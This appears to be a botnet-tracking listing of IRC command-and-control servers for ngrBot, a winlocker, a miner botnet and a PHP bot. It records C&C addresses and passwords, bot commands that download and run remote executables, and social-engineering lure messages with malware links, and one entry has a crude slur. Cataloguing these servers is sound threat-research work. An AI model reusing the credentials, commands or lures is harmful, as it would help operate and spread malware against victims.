Remote Host Port Number 31.31.76.89 6667 PONG :A55A8CFA JOIN #blackout Now talking in #blackout Topic On: [ #blackout ] [ #blackout ] Topic By: [ JohnDoe ] Modes On: [ #blackout ] [ +sntru ] hosting infos: http://whois.domaintools.com/31.31.76.89
46.166.162.116(irc botnet hosted in United Kingdom Santrex Internet Services Ltd)
46.166.162.116:8585 nick yycIaIc user yudtouga channel #c Now talking in #c Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ] Topic By: [ rise ] hosting infos: http://whois.domaintools.com/46.166.162.116
pool.dload.asia(Bitcoin Miner Botnet hosted in France Paris Gandi)
Very big net here the gay behind the net is making alot of money from infected machines Resolved : [pool.dload.asia] To [95.142.174.210] Resolved : [pool.dload.asia] To [92.243.3.252] Resolved : [pool.dload.asia] To [95.142.175.27] Resolved : [pool.dload.asia] To [95.142.161.74] Resolved : [pool.dload.asia] To [95.142.174.205] Resolved : [pool.dload.asia] To [95.142.170.142] Resolved : [pool.dload.asia] To [95.142.174.64] Resolved : [pool.dload.asia]Read more...
sukipuki4mokimoki.in(winlocker hosted in United States Clarks Summit Volumedrive)
HTTP Query Text sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1 sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1 Suspicious Actions Detected Copies self to other locations Creates autorun records Injects code into other processes exe file Download Download hosting infos: http://whois.domaintools.com/199.168.139.53
74.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)
Remote Host Port Number 199.15.234.7 80 203.249.66.5 80 74.63.232.209 5236 PASS ROCKR PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |” PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD” PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – RedirectedRead more...
ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)
Resolved : [ch1mb4.info] To [74.62.155.207] C&C Server: 74.62.155.207:6060 Server Password: Username: uamethp Nickname: n{DE|XPa}uamethp Channel: #hell (Password: secret) Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt hosting infos: http://whois.domaintools.com/74.62.155.207
64.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)
Older version of ngrBot with the original manual included Remote Host Port Number 199.15.234.7 80 64.186.134.161 7834 PASS puto NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #dr3 ngrBot Now talking in #dr3 Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ] Topic By: [Read more...
83.170.89.35(linux bots hosted in United Kingdom London Uk2 – Ltd)
<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dns <IP|HOST> //dns lookup * .download <URL> <filename> //downloadRead more...
94.102.0.165(ngrBot hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host Port Number 199.15.234.7 80 94.102.0.165 4444 PASS pas217 JOIN #voLwy vol323 PONG :HTTP1.4 NICK n{US|XP-32a}mwwaozy USER mwwaozy 0 * :mwwaozy hosting infos: http://whois.domaintools.com/94.102.0.165
lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)
Resolved : [lalorlz1.info] To [88.198.181.16] Resolved : [lalorlz1.info] To [176.9.192.216] rlz1jmv.info not active C&C Server: 88.198.181.16:5236 PASS ROCKR Server Password: Username: raecpnp Nickname: n{DE|XPa}raecpnp Channel: #ROCK (Password: ngrBot) Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira a miley cyrus desnuda y dopada en un hotelRead more...